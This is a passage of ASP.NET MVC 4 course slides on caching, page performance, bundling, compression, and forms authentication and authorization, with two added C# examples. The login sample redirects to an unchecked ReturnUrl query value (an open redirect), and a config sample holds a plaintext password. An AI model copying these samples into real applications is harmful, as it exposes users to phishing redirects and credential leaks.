Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)
AppleWebKit/536.26 (KHTML, like Gecko)
In spite of a misleading name, the DefaultDisplayMode
class is just the class that represents a display mode
Here's how Microsoft's one for mobile is written
var mode = new DefaultDisplayMode(MobileDisplayModeId)
{
ContextCondition =
context => context.GetOverriddenBrowser().IsMobileDevice
};
Multiple Views and DisplayMode Providers in ASP.NET MVC 4
https://www.simple-talk.com/dotnet/asp.net/multiple-views-and-displaymode-providers-in-asp.net-mvc-4/
Browsers
8. 7
Determining the Browser Type
Not all browsers render HTML identically
To generate different versions of a page for different
browsers we need to know capabilities of a browser
Request.Browser (HttpBrowserCapabilities) properties
Read the strongly-typed property or the string-keyed collection
var cookiesSupported = Request.Browser.Cookies;
// or Request.Browser["Cookies"]
Cast to MobileCapabilities to get more details if the browser is
running on a mobile device
var mobile = Request.Browser.IsMobileDevice;
// (Request.Browser as MobileCapabilities)
Warning! Capabilities indicate support for a feature, not if that
feature is currently enabled, for example, Cookies
Browsers
8. 8
How Browser Capabilities are Defined
Microsoft supplies definition files for most browsers
\WINDOWS\Microsoft.NET\Framework\v4.0.30319\CONFIG\Browsers
These files are compiled and deployed to the GAC to improve
performance, so if you add or modify you must re-register
aspnet_regbrowsers.exe -i
For a specific web application you can create browser
definition files in a special sub-folder
App_Browsers
<browserCaps> element in Web.config is obsolete
9. 1
Module 9
Building Responsive Pages in
ASP.NET MVC 4 Web Applications
Developing ASP.NET MVC 4
Web Applications
Updated 11th April 2014
Building Responsive Pages in ASP.NET MVC 4 Web Applications
9. 2
Contents
Topic
Slide
Partial Page Updates
Caching Overview
System.Web.Caching
System.Runtime.Caching
OutputCache 11
Caching Configuration 13
Performance 14
Exam Topic: Design a caching strategy
Implement page output caching (performance oriented)
Implement data caching
Implement HTTP caching
Exam Topic: Design and implement UI behavior
Use AJAX to make partial page updates
Partial Page Updates
9. 3
Ajax.ActionLink
MOC code on page 09-4
Unnecessary to add [HttpGet]
MOC code on page 09-5
@Ajax.ActionLink("Refresh", "HelloWorld", new AjaxOptions {
HttpMethod = "POST", UpdateTargetId = "divMessage",
InsertionMode = InsertionMode.Replace })
Use HttpMethod = "POST" to ensure the response isn't cached
(GET would work only once!)
InsertionMode: Replace, InsertBefore, InsertAfter
NOTE: when using the Basic template, add jqueryval bundle
to bottom of _Layout.cshtml or the code won't work
@Scripts.Render("~/bundles/jqueryval")
AjaxOptions Class
http://msdn.microsoft.com/en-us/library/system.web.mvc.ajax.ajaxoptions(v=vs.108).aspx
Caching Overview
9. 4
Types of Caching
Caching stores frequently accessed data in memory
where it can be retrieved faster than it could be from a
file or database
ASP.NET MVC needs two types of caching
Model caching (Cache or MemoryCache)
Cache and MemoryCache objects are dictionaries that can store
any object in server memory and automatically remove it based
on memory limitations, time limits, or other dependencies
View caching (OutputCache, Response.Cache)
OutputCache is an attribute that can cache an ActionResult on
the server (or browser or intermediaries) to avoid needing to
call that action method for future requests (for a duration)
Response.Cache controls where HTTP GET responses can be
cached (server, intermediaries, browser)
9. 5
System.Web.Caching
How to Store Objects in the Cache
using System.Web.Caching;
Assignment
Assigns a value to an unused key or replaces existing value
HttpContext.Current.Cache["Greeting"] = "Hello, world!";
Insert method (overloaded), replaces if duplicate key
Provides (optional) parameters to customize items in the cache
HttpContext.Current.Cache.Insert("Greeting", "Hello, world!");
Add method, throws exception if duplicate key
Requires all parameters to be specified
HttpContext.Current.Cache.Add("Greeting", "Hello, world!",
null,
DateTime.Now.AddSeconds(60), Cache.NoSlidingExpiration,
CacheItemPriority.High, onRemoveCallback);
System.Web.Caching
9. 6
Cache Insert and Add Methods Parameters
key | The identifier used to access the cached data
value | The data to cache
dependencies | A CacheDependency object that references a file, other object in the cache, or database command used to track changes to data outside of the cache
absoluteExpiration | A DateTime or Cache.NoAbsoluteExpiration when using sliding expiration
slidingExpiration | A TimeSpan that identifies how long the data should remain in the cache after the data was last accessed or Cache.NoSlidingExpiration when using absolute expiration
priority | A CacheItemPriority enumeration value identifying the relative priority of the cached data (Low, BelowNormal, Normal, AboveNormal, High, NotRemovable*)
onRemoveCallback | A delegate to call when the data is removed from the cache; CacheItemRemovedReason: Removed, Expired, Underused, DependencyChanged
*NotRemovable means that Microsoft's algorithm will not remove such an item when you get low on memory, but that it can expire or be removed by a dependency
9. 7
System.Web.Caching
Defining a Cache Dependency
To create a file dependency
using System.Web.Caching;
var dep1 = new CacheDependency(Server.MapPath("products.xml"));
To create an object dependency
string[] keyDeps = { "CachedObject1", "CachedObject2" };
var dep2 = new CacheDependency(null, keyDeps);
To create an SQL dependency
var dep3 = new SqlCacheDependency("Northwind", "Products");
To cache an object with one of the above dependencies
HttpContext.Current.Cache.Insert(
"CachedProducts", service.GetProducts(), dep3);
9. 8
System.Web.Caching
SqlCacheDependency
Modify the web.config
<caching>
  <sqlCacheDependency enabled="true" pollTime="30000">
    <databases>
      <add name="Northwind" connectionStringName="NorthwindConnection"/>
    </databases>
  </sqlCacheDependency>
</caching>
Activate the SqlCacheDependency in the Global.asax
using System.Web.Caching;
SqlCacheDependencyAdmin.EnableNotifications(connectionString);
SqlCacheDependencyAdmin.EnableTableForNotifications(
    connectionString, "Products");
Enable cache dependencies on the table
aspnet_regsql.exe -S [YOURSERVER] -U [USERNAME] -P [PASSWORD]
-ed -d [DATABASE] -et -t [TABLENAME]
Activate ASP.NET MVC3 Caching with Database Dependency
http://sdeu.wordpress.com/2011/02/08/activate-asp-net-mvc3-caching-with-database-dependency/
9. 9
System.Runtime.Caching
What Is the MemoryCache?
Introduced in .NET 4, it is similar to the Cache
Moved out of ASP.NET so it can be used by other .NET apps
Supports multiple instances, as well as a Default instance
using System.Runtime.Caching;
var policy = new CacheItemPolicy
{ SlidingExpiration = TimeSpan.FromHours(2) };
MemoryCache.Default.Set("MyCustomers", service.GetCustomers(),
policy, null); // last parameter is region (not supported)
var cachedObject = MemoryCache.Default.Get("MyCustomers");
if (cachedObject != null)
Although it is not a singleton, avoid creating too many
instances, and use Default when possible
MemoryCache.Set Method (String, Object, CacheItemPolicy, String)
http://msdn.microsoft.com/en-us/library/ee395903(v=vs.110).aspx
9. 10
System.Runtime.Caching
What Is AddOrGetExisting Used For?
It is NOT used to either get or reload an existing cached
object, as incorrectly explained in the MOC
var cachedObject = MemoryCache.Default.AddOrGetExisting(
"MyCustomers", service.GetCustomers(), policy, null);
There are often situations where you only want to create a
cache entry if a matching entry doesn't already exist (that is,
you don't want to overwrite an existing value)
Without AddOrGetExisting it would be impossible to perform the
get-test-set in an atomic, thread-safe manner
Thread 1: Get("foo")
Thread 2: Get("foo")
Thread 1: Set("foo", "something")
Thread 2: Set("foo", "something else")
MemoryCache.AddOrGetExisting
http://stackoverflow.com/questions/14698228/what-is-memorycache-addorgetexisting-for
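A get-or-add helper built on AddOrGetExisting, as an added example that is not part of the courseware. Wrapping the value in Lazy<T> keeps the insert atomic and stops the expensive load from running on every call, which passing service.GetCustomers() directly as the value argument would do. The GetOrAdd helper, the loader and the sample data are assumptions for illustration.

```csharp
using System;
using System.Runtime.Caching;
using System.Threading;
using System.Threading.Tasks;

public static class ObjectCacheExtensions
{
    // Hypothetical helper; it is not part of System.Runtime.Caching.
    public static T GetOrAdd<T>(this ObjectCache cache, string key,
        Func<T> factory, CacheItemPolicy policy)
    {
        // Lazy<T> defaults to ExecutionAndPublication: one thread runs the
        // factory, every other thread waits for that single result.
        var fresh = new Lazy<T>(factory);

        // Atomic: returns the entry already stored under the key, or null
        // when our Lazy<T> was the one that got inserted.
        var existing = (Lazy<T>)cache.AddOrGetExisting(key, fresh, policy);

        try
        {
            return (existing ?? fresh).Value;
        }
        catch
        {
            // A faulted Lazy<T> would rethrow forever; evict it so that the
            // next caller retries the load.
            cache.Remove(key);
            throw;
        }
    }
}

public static class Program
{
    private static int loads; // how many times the expensive load really ran

    private static string[] LoadCustomers()
    {
        Interlocked.Increment(ref loads);
        Thread.Sleep(100);               // stand-in for a slow database call
        return new[] { "Alice", "Bob" }; // constructed sample data
    }

    public static void Main()
    {
        var policy = new CacheItemPolicy { SlidingExpiration = TimeSpan.FromHours(2) };

        // Eight concurrent "requests" ask for the same key at once.
        Parallel.For(0, 8, i =>
        {
            string[] customers = MemoryCache.Default.GetOrAdd<string[]>(
                "MyCustomers", LoadCustomers, policy);
            Console.WriteLine("Request {0} sees {1} customers", i, customers.Length);
        });

        Console.WriteLine("Loader ran {0} time(s)", loads);
    }
}
```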
System.Runtime.Caching
9. 11
CacheItemPolicy
Represents a set of eviction and expiration details for a
specific cache entry
AbsoluteExpiration: DateTime
SlidingExpiration: TimeSpan
Priority: Default, NotRemovable
ChangeMonitors: CacheEntryChangeMonitor,
HostFileChangeMonitor, SqlChangeMonitor
UpdateCallback: before object is removed
RemovedCallback: after object is removed
CacheEntryUpdateArguments Class
http://msdn.microsoft.com/en-us/library/system.runtime.caching.cacheentryupdatearguments(v=vs.110).aspx
ChangeMonitor Class
http://msdn.microsoft.com/en-us/library/system.runtime.caching.changemonitor(v=vs.110).aspx
CacheItemPolicy Class
http://msdn.microsoft.com/en-us/library/system.runtime.caching.cacheitempolicy(v=vs.110).aspx
OutputCache
9. 12
OutputCache Attribute
Cache the view of an action method for 15 seconds
Each route gets its own copy of the cached view, for example
/Product/Detail/1 and /Product/Detail/2
[OutputCache(Duration = 15)]
public ActionResult Detail(int id = 0) {
ViewBag.Message = "Page was cached at " + DateTime.Now;
return View(GetProduct(id));
}
If you need to store multiple copies per query string or form
parameter, use VaryByParam
[OutputCache(Duration = 15, VaryByParam = "colour")]
public ActionResult Detail(int id = 0, string colour = null) {
ViewBag.Message = "Page was cached at " + DateTime.Now;
return View(GetProductByColour(id, colour));
}
@OutputCache with Web Forms caches different pages for each
browser; in MVC you must explicitly switch this feature on
[OutputCache(Duration = 15, VaryByCustom = "browser")]
9. 13
OutputCache
Configuring Caching
Duration (required)
The number of seconds to cache the page
VaryByParam
A semicolon-separated list of query string or post values used to
vary the output cache, or use *
Location
OutputCacheLocation enumeration: Any (default), Client,
Downstream, Server, None, or ServerAndClient
CacheProfile
Name of a profile defined in Web.config
NoStore
If true, prevents secondary storage of sensitive information
SqlDependency
A set of database and table name pairs that cache depends on
VaryByCustom
If a custom string is entered, override the GetVaryByCustomString
method in the Global.asax file; browser is built-in
VaryByHeader
A semicolon-separated list of HTTP headers
VaryByContentEncoding
A comma-delimited set of character sets (content encodings) used
to vary the cache entry
[OutputCache(Duration = 3600, SqlDependency = "Northwind:Products")]
public ActionResult Index() // cache for one hour unless table changes
OutputCacheAttribute Class
http://msdn.microsoft.com/en-us/library/system.web.mvc.outputcacheattribute.aspx
Caching Configuration
9. 14
Configuring Caching for an Entire Site
Define cache profile in Web.config
Reference the profile in @OutputCache directives (Web Forms)
or OutputCache attributes (MVC)
<caching>
<outputCacheSettings>
<outputCacheProfiles>
<add name="OneMinuteProfile" enabled="true" duration="60" />
</outputCacheProfiles>
</outputCacheSettings>
<cache percentagePhysicalMemoryUsedLimit="90" />
<sqlCacheDependency enabled="true" pollTime="90">
<databases>
<add ... />
</databases>
</sqlCacheDependency>
</caching>
pollTime is only necessary for SQL Server 7.0 and 2000
The query notification mechanism of SQL Server 2005 detects
changes to data that invalidate the results of an SQL query and
removes any cached items associated with the SQL query
Downstream Caching
9. 15
Response.Cache Location
Use SetCacheability(HttpCacheability) to control
caching in intermediaries and browsers
Response.Cache.SetCacheability(HttpCacheability.Public);
NoCache, Server,
ServerAndNoCache
Sets the Cache-Control: no-cache header. With a field name, the
directive applies only to the named field; the rest of the response may
be supplied from a shared cache. Server or ServerAndNoCache specify
that the response is cached only at the origin server. NoCache or
ServerAndNoCache specify that the Expires HTTP header is set to -1.
This tells the client to not cache responses in the History folder. So
each time you use the back/forward buttons, the client requests a new
version of the response.
Private
Sets Cache-Control: private to specify that the response is cacheable
only on the client
Public
Sets Cache-Control: public
ServerAndPrivate
Proxy servers are not allowed to cache the response
HttpCacheability Enumeration
http://msdn.microsoft.com/en-us/library/system.web.httpcacheability(v=vs.110).aspx
Downstream Caching
9. 16
Response.Cache Browser History
You can control if a response is shown in history
Makes the response available in the browser History cache,
regardless of the HttpCacheability setting made on the server
Response.Cache.SetAllowResponseInBrowserHistory(true);
When HttpCacheability is set to NoCache or ServerAndNoCache
the Expires HTTP header is by default set to -1
You can override this behavior by calling
SetAllowResponseInBrowserHistory as above
If HttpCacheability is set to values other than NoCache or
ServerAndNoCache, then SetAllowResponseInBrowserHistory has
no effect
HttpCachePolicy.SetAllowResponseInBrowserHistory Method
http://msdn.microsoft.com/en-us/library/system.web.httpcachepolicy.setallowresponseinbrowserhistory(v=vs.110).aspx
9. 17
Downstream Caching
Response.Cache Expiry
You can control how long responses get cached
Sets the Expires HTTP header to an absolute date and time
Response.Cache.SetExpires(DateTime.Parse("6:00:00PM"));
// expire in one minute
Response.Cache.SetExpires(DateTime.Now.AddMinutes(1.0));
When cache expiration is set to sliding, the Cache-Control HTTP
header will be renewed with each response
Response.Cache.SetSlidingExpiration(true);
Set the Max-age HTTP header to a sliding timespan
Response.Cache.SetMaxAge(TimeSpan.FromMinutes(30));
HttpCachePolicy.SetExpires Method
http://msdn.microsoft.com/en-us/library/system.web.httpcachepolicy.setexpires(v=vs.110).aspx
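Applying the OutputCache and Response.Cache settings to pages that differ per signed-in user, as an added example (not from the courseware): a filter that keeps a response out of browser and proxy caches, and a VaryByCustom key so the server-side output cache stores one copy per user. The NoStoreAttribute filter, the "user" custom string and the controller and action names are assumptions.

```csharp
using System;
using System.Web;
using System.Web.Mvc;
using System.Web.UI; // OutputCacheLocation

// Hypothetical filter: marks the response as not cacheable anywhere downstream.
public sealed class NoStoreAttribute : ActionFilterAttribute
{
    public override void OnResultExecuting(ResultExecutingContext filterContext)
    {
        HttpCachePolicyBase cache = filterContext.HttpContext.Response.Cache;
        cache.SetCacheability(HttpCacheability.NoCache); // Cache-Control: no-cache, Expires: -1
        cache.SetNoStore();                              // adds no-store (no secondary storage)
        cache.SetAllowResponseInBrowserHistory(false);   // keep the Expires: -1 behaviour
        base.OnResultExecuting(filterContext);
    }
}

public class BankingController : Controller
{
    // Same content for every visitor: safe for browsers and proxies to share.
    [OutputCache(Duration = 60, VaryByParam = "id", Location = OutputCacheLocation.Any)]
    public ActionResult Rates(int id = 0)
    {
        return Content("Public rates table " + id);
    }

    // Different per user and sensitive: never stored by browser or proxy.
    [Authorize]
    [NoStore]
    public ActionResult Statement()
    {
        return Content("Statement for " + User.Identity.Name);
    }

    // Different per user but expensive to build: cache on the origin server
    // only, and keep a separate copy for each signed-in user.
    [Authorize]
    [OutputCache(Duration = 15, VaryByParam = "none",
        Location = OutputCacheLocation.Server, VaryByCustom = "user")]
    public ActionResult Dashboard()
    {
        return Content("Dashboard for " + User.Identity.Name + " built at " + DateTime.Now);
    }
}

// Global.asax.cs: supplies the cache key part for VaryByCustom = "user".
public class MvcApplication : HttpApplication
{
    public override string GetVaryByCustomString(HttpContext context, string custom)
    {
        if (string.Equals(custom, "user", StringComparison.OrdinalIgnoreCase))
        {
            var user = context.User;
            return (user != null && user.Identity.IsAuthenticated)
                ? "u:" + user.Identity.Name
                : "anonymous";
        }
        return base.GetVaryByCustomString(context, custom); // "browser" stays built in
    }
}
```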
9. 18
Performance
YSlow
YSlow analyzes web pages and suggests ways to
improve their performance based on a set of rules for
high performance web pages
Top Twelve Rules
1. Minimize HTTP Requests
2. Use a Content Delivery Network
3. Avoid empty src or href
4. Add an Expires or a Cache-Control Header
5. Gzip Components
6. Put StyleSheets at the Top
7. Put Scripts at the Bottom
8. Avoid CSS Expressions
9. Make JavaScript and CSS External
10. Reduce DNS Lookups
11. Minify JavaScript and CSS
12. Avoid Redirects
YSlow
http://developer.yahoo.com/yslow/
Performance
9. 19
1. Minimize HTTP Requests
This is the Performance Golden Rule because 80-90% of
the end-user response time is spent on the front-end
Most of this time is tied up in downloading all the components
in the page: images, stylesheets, scripts, and so on
Reducing the number of components reduces the number of
HTTP requests required to render the page
The easiest way to achieve this for styles and scripts
with ASP.NET MVC is to use bundling (next module)
CSS Sprites are the preferred method for reducing the
number of image requests
CSS Sprites
http://alistapart.com/article/sprites
Performance
9. 20
2. Use a Content Delivery Network (CDN)
The user's proximity to your web server has an impact
on response times
Deploying your content across multiple, geographically
dispersed servers will make your pages load faster from the
user's perspective
When a URL's protocol is omitted, the browser uses the
underlying document's protocol instead
This protocol-less URL is the best way to reference third party
content that's available via both HTTP and HTTPS
//ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
Cripple the Google CDN's caching with a single character
http://encosia.com/cripple-the-google-cdns-caching-with-a-single-character/
9. 21
Performance
3. Avoid Empty Image src
The effect of having empty image src
<img src="">
var img = new Image();
img.src = "";
Internet Explorer makes a request to the directory in which the
page is located
Safari and Chrome make a request to the actual page itself
Even though the image request does not return an
image, all of the headers are read and accepted by the
browser, including all cookies
Similarly for script and link
<script src="">
<link href="">
Empty image src can destroy your site
http://www.nczonline.net/blog/2009/11/30/empty-image-src-can-destroy-your-site/
9. 22
Performance
4. Add an Expires or a Cache-Control Header
For static components
Implement a Never expire policy by setting far future Expires
header
Expires: Thu, 15 Apr 2090 20:00:00 GMT
A first-time visitor to your page may have to make several HTTP
requests, but by using the Expires header you make those
components cacheable
Remember to change the component's filename whenever the
component changes, for example, yahoo_2.0.6.js
For dynamic components
Use an appropriate Cache-Control header to help the browser
with conditional requests
Performance
9. 23
5. Gzip Components
Web clients indicate support for compression with the
Accept-Encoding header in the HTTP request
Accept-Encoding: gzip, deflate
If the web server sees this header in the request, it
may compress the response using one of the methods
listed by the client
The web server notifies the web client of this via the
Content-Encoding header in the response
Content-Encoding: gzip
Gzip is the most popular and effective compression
method at this time
Performance
9. 24
6. & 7. Put Stylesheets at the Top, Scripts at Bottom
Moving stylesheets to the document HEAD makes pages
appear to be loading faster
This is because putting stylesheets in the HEAD allows the page
to render progressively, so the header, the navigation bar, the
logo at the top, and so on all serve as visual feedback for the
user who is waiting for the page
The problem caused by scripts is that they block
parallel downloads
While a script is downloading the browser won't start any other
downloads
8. Avoid CSS Expressions
CSS expressions are a powerful (and dangerous) way to set CSS
properties dynamically; supported in Internet Explorer starting
with version 5, but were deprecated starting with IE8
Performance
9. 25
9. Make JavaScript and CSS External
Using external files generally produces faster pages
because the files are cached by the browser
JavaScript and CSS that are inlined in HTML documents get
downloaded every time the HTML document is requested
This reduces the number of HTTP requests that are needed, but
increases the size of the HTML document
On the other hand, if the JavaScript and CSS are in external
files cached by the browser, the size of the HTML document is
reduced without increasing the number of HTTP requests
The only exception where inlining is preferable is with home
pages because home pages that have few (perhaps only one)
page view per session may find that inlining JavaScript and CSS
results in faster end-user response times
Performance
9. 26
11. Minify JavaScript and CSS
Minification is the practice of removing unnecessary
characters from code to reduce its size thereby
improving load times
When code is minified all comments are removed, as well as
unneeded white space characters (space, newline, and tab)
Even if you gzip your scripts and styles, minifying them will still
reduce the size by 5% or more
Performance
9. 27
12. Avoid Redirects
One of the most wasteful redirects happens frequently
and web developers are generally not aware of it
It occurs when a trailing slash (/) is missing from a URL
For example, going to http://astrology.yahoo.com/astrology
results in a 301 response containing a redirect to
http://astrology.yahoo.com/astrology/
Performance
9. 28
Split Components Across Domains
Splitting components allows you to maximize parallel
downloads
Make sure you're using not more than 2-4 domains because of
the DNS lookup penalty
For example, you can host your HTML and dynamic content on
www.example.org and split static components between
static1.example.org and static2.example.org
Performance Research, Part 4: Maximizing Parallel Downloads in the Carpool Lane
http://yuiblog.com/blog/2007/04/11/performance-research-part-4/
10. 1
Module 10
Using JavaScript and jQuery for
Responsive MVC 4 Web Applications
Developing ASP.NET MVC 4
Web Applications
Updated 11th April 2014
10. 2
Using JavaScript and jQuery for Responsive MVC 4 Web Applications
Contents
Exam Topic: Design and implement UI behavior
Implement client validation
Use JavaScript and the DOM to control application behavior
Extend objects by using prototypal inheritance
Implement the UI by using JQuery
Exam Topic: Reduce network bandwidth
Bundle and minify scripts (CSS and JavaScript)
Compress and decompress data (using gzip/deflate; storage)
Plan a content delivery network (CDN) strategy, for example, Windows Azure CDN
From the 20480 HTML5 course review the following
20480.03.JavaScript
20480.05.Ajax
20480.07.Objects
20480.C.Cross.Domain.Requests
10. 3
Optimization
Bundling, Minification, and Compression
Bundling
Combining multiple files into a single request
Minification
Stripping whitespace and comments and unused functions and
using shorter variable and parameter names
(function () { // firebrand
var apples = 10;
function neverUsed() {
console.log("never used");
}
console.log(apples);
})();
minifies to
(function(){console.log(10)})()
Compression
Compressing files on the web server and decompressing them on
the browser to reduce bandwidth requirements
a.html (120kb) to a.gzip (30kb)
Optimization
10. 4
Bundling and Minification
Bundling and minification are two techniques you can
use in ASP.NET 4.5 to improve request load time
Improves load time by reducing the number of requests to the
server and reducing the size of requested assets
Use bundling instead of embedding resources in a DLL
Minification is disabled when debug is true
Unless BundleTable.EnableOptimizations is true in Global.asax
{version} is used to automatically create a bundle with
the latest version of jQuery in your Scripts folder
public static void RegisterBundles(BundleCollection bundles) {
bundles.Add(new ScriptBundle("~/bundles/jquery").Include(
"~/Scripts/jquery-{version}.js"));
}
Bundling and Minification
http://www.asp.net/mvc/tutorials/mvc-4/bundling-and-minification
Optimization
10. 5
Bundling and Minification
Debug mode
<compilation debug="true" />
<script src="/Scripts/bootstrap.js"></script>
<script src="/Scripts/respond.js"></script>
Release mode
<compilation debug="false" />
<script src="/bundles/bootstrap?v=2Fz3B0iizV2NnnamQFrxNbYJNTFeBJ2GM05SilbtQU1"></script>
Note: the hash/digest used will automatically change if any file
in the bundle (or its minified version!) changes
ASP.NET will automatically minify your files if you have
not created a .min. version (but see next slide!)
Optimization
10. 6
Minification Changes
As well as stripping whitespace and comments,
minification would change this
function StartController($scope, $location, $rootScope) { }
To this
function StartController(n, t, i) { }
When using AngularJS, for dependency injection to
work, the argument names must not be changed
This isn't something you can change on the built-in bundle
types, [...] write your own IBundleTransform - Microsoft
public class CustomTransform : IBundleTransform {
public void Process(BundleContext context, BundleResponse response) {
}
}
System.Web.Optimization making function argument names stay the same for certain functions
http://stackoverflow.com/questions/13032721/system-web-optimization-making-function-argument-names-stay-the-same-for-certain
10. 7
Optimization
HTTP Compression
To enable gzip compression in .config for IIS
<system.webServer>
<httpCompression
directory="%SystemDrive%\inetpub\temp\IIS Temporary Compressed Files">
<scheme name="gzip" dll="%Windir%\system32\inetsrv\gzip.dll"/>
<dynamicTypes>
<add mimeType="text/*" enabled="true"/>
<add mimeType="message/*" enabled="true"/>
<add mimeType="application/javascript" enabled="true"/>
<add mimeType="*/*" enabled="false"/>
</dynamicTypes>
<staticTypes>
<add mimeType="text/*" enabled="true"/>
<add mimeType="message/*" enabled="true"/>
<add mimeType="application/javascript" enabled="true"/>
<add mimeType="*/*" enabled="false"/>
</staticTypes>
</httpCompression>
<urlCompression doStaticCompression="true" doDynamicCompression="true"/>
</system.webServer>
HTTP Compression <httpCompression>
http://www.iis.net/configreference/system.webserver/httpcompression
10. 8
Optimization
HTTP Compression
What is gzip compression ratio?
It depends!
File: Compressed Size / Ratio
1Gb file full of zeros: ~120kb
Image files in a format that is compressed natively (gif, jpg, png, and so on): Little or no compression
Binary files like program executables (exe): ~2:1 compression
Plain text, HTML or other markup: 3:1 or 4:1 or more
11. 1
Module 11
Controlling Access to ASP.NET
MVC 4 Web Application
Developing ASP.NET MVC 4
Web Applications
Updated 11th April 2014
Controlling Access to ASP.NET MVC 4 Web Application
11. 2
Contents
Topic
Slide
Authentication
Authorization
Forms Auth.
ASP.NET Membership
Impersonation
22
WIF and ACS
23
Custom Security
25
Misc
28
Exam Topic: Configure and apply authorization
Create roles
Authorize roles by using configuration
Authorize roles programmatically
Create custom role providers
Implement WCF service authorization
Exam Topic: Implement a secure site with ASP.NET
Secure communication by applying SSL certificates
Salt and hash passwords for storage
Exam Topic: Design and implement claims-based
authentication across federated identity stores
Implement federated authentication by using
Windows Azure Access Control Service
Create a custom security token by using Windows
Identity Foundation
Handle token formats (for example, oAuth, OpenID,
LiveID, and Facebook) for SAML and SWT tokens
Exam Topic: Configure authentication
Authenticate users
Enforce authentication settings
Choose between Windows, Forms,
and custom authentication
Manage user session by using cookies
Configure membership providers
Create custom membership providers
11. 3
Authentication
ASP.NET and IIS Authentication Combinations
Authentication is set with a combination of settings in
IIS .config and ASP.NET Web.config
IIS Authentication on, ASP.NET authentication off
<authentication mode="Windows" />
Basic: Non-IE, prompts for Windows accounts
Digest: Non-IE, prompts for Windows account
Windows Integrated: IE/Firefox auto-login; NTLM, Kerberos
Use Windows for intranet sites
where users have a Windows account
IIS Authentication off, ASP.NET authentication on
<authentication mode="Forms" />
Anonymous: IUSR_computername
mode="Forms": Use a MembershipProvider
mode="None": Federated/claims-based
mode="Passport": Pay Microsoft
Use Forms for internet sites
where users are stored in a
Membership provider or claims
Authorization
11. 4
MVC Authorizing
To ensure users are authenticated
Anonymous users will be redirected to login view
[Authorize]
public ActionResult Create() {
To authorize by user and role or Windows group
String values depend on Windows or Forms authentication
[Authorize(Users="Mary,Omar", Roles="Admin")]
public ActionResult Create() {
When authenticated we can authorize by user and role
if (User.IsInRole("Sales"))
return View("SpecialViewForSales");
if (User.Identity.Name == "Fred") {
return View("SpecialViewForFred");
} else {
return View();
}
11. 5
Authorization
MVC Authorizing
If you apply Authorize to a whole class, you can still
allow anonymous for individual actions
[Authorize] // require all requests to authenticate
public class ProductController : Controller {
[AllowAnonymous] // disable authentication for this action
public ActionResult Index()
{
}
public ActionResult Display() // inherit from controller
{
}
[Authorize(Users="Mary,Omar", Roles="Admin")]
public ActionResult Edit()
{
}
}
11. 6
Authorization
Finding Out About the Current User
HttpContext.User returns an IPrincipal object
IsInRole(string)
Identity
if (User.IsInRole("Sales"))
Identity property implements IIdentity interface
AuthenticationType (NTLM, custom, and so on)
IsAuthenticated (true/false)
Name
if (User.Identity.Name == "Fred")
Could also use Roles class in System.Web.Security
using System.Web.Security;
if (Roles.IsUserInRole("John", "HR"))
Forms Authentication
11. 7
Configuring
Defaults for strings are shown, others are underlined
name: Cookie name
loginUrl, defaultUrl: Change to MVC routes
timeout: minutes
requireSSL: If true you must configure SSL certificate in IIS
<system.web>
<authentication mode="Forms">
<forms name=".ASPXAUTH"
loginUrl="login.aspx"
defaultUrl="default.aspx"
protection="[All|None|Encryption|Validation]"
timeout="30"
path="/"
requireSSL="[true|false]"
slidingExpiration="[true|false]"
enableCrossAppRedirects="[true|false]"
cookieless="[UseUri|true|UseCookies|false|AutoDetect|UseDeviceProfile]"
domain=""
ticketCompatibilityMode="[Framework20|Framework40]">
<credentials>
<user name="Bob" password="secret"/>
</credentials>
</forms>
</authentication>
</system.web>
forms Element for authentication (ASP.NET Settings Schema)
http://msdn.microsoft.com/en-us/library/vstudio/1d3t3c61(v=vs.100).aspx
Forms Authentication
11. 8
FormsAuthentication Properties
Static read-only properties (set in .config)
IsEnabled, FormsCookieName, FormsCookiePath, RequireSSL,
SlidingExpiration, CookieDomain, CookieMode, DefaultUrl,
LoginUrl, Timeout
Methods
SetAuthCookie, GetAuthCookie: Creates an authentication
ticket for the supplied user name and adds it to the cookies
collection of the response
Encrypt, Decrypt: Creates a string containing an encrypted
forms-authentication ticket suitable for use in an HTTP cookie
RedirectFromLoginUrl, GetRedirectUrl: Redirects user back to
the originally requested URL or the default URL
SignOut: Removes the forms-authentication ticket from browser
FormsAuthentication Class
http://msdn.microsoft.com/en-us/library/system.web.security.formsauthentication.aspx
ASP.NET Membership
11. 9
Providers
SqlMembershipProvider in .NET 2.0 and later
Uses fixed schema for users and roles (aspnetdb.mdf by default)
Focused on traditional membership (user has a username and a
password), in OAuth/OpenID the user doesn't have a password
SimpleMembershipProvider in .NET 4.5 and later
Designed as a replacement for the previous ASP.NET Role and
Membership provider system
The ASP.NET MVC 4 Internet application template
AccountController requires SimpleMembership and is not
compatible with previous MembershipProviders
You can continue to use existing ASP.NET Role and Membership
providers in ASP.NET 4.5 and ASP.NET MVC 4 - just not with the
ASP.NET MVC 4 AccountController
SimpleMembership, Membership Providers, Universal Providers
http://weblogs.asp.net/jgalloway/archive/2012/08/29/simplemembership-membership-providers-universal-providers-and-the-new-asp-net-4-5-web-forms-and-asp-net-mvc-4-templates.aspx
ASP.NET Membership
11. 10
SimpleMembershipProvider
SimpleRoleProvider simply implements the
RoleProvider abstract base class (from .NET 2.0) and
does not add anything more
ExtendedMembershipProvider abstract class inherits
from the core MembershipProvider abstract base class
Also added a new WebSecurity class which provides a nice
façade to SimpleMembershipProvider
You might have a users table and want to
integrate it with SimpleMembership
SimpleMembership requires that there are two columns on your
users table (an ID column and a username column), but
they can be named whatever you want
Using SimpleMembership With ASP.NET WebPages
http://blog.osbornm.com/2010/07/21/using-simplemembership-with-asp.net-webpages
ASP.NET Membership
11. 11
SimpleMembershipProvider
Now that we have created our users table we need to
wire it up to SimpleMembership so that
SimpleMembership knows what columns to use
Parameters of WebSecurity.InitializeDatabaseFile are
name of the database file
name of the table you are using for the users table
name of the column being used for the ID
name of the column you are using for the username
WebSecurity.InitializeDatabaseFile(
"SecurityDemo.sdf", "Users", "UserID", "Username", true);
Last parameter indicates if the table should be automatically
created
ASP.NET Membership
11. 12
SimpleMembershipProvider
To create a register view
Where the anonymous object represents the extra columns in
your users table
WebSecurity.CreateUserAndAccount(username, password, new {
FirstName = fname, LastName = lname, Email = email,
StartDate = DateTime.Now, Bio = bio});
To create a login view
if (WebSecurity.Login(username, password)) {
var returnUrl = Request.QueryString["ReturnUrl"];
if(returnUrl.IsEmpty()) {
Response.Redirect("~/Account/Profile");
} else {
Response.Redirect(returnUrl);
}
}
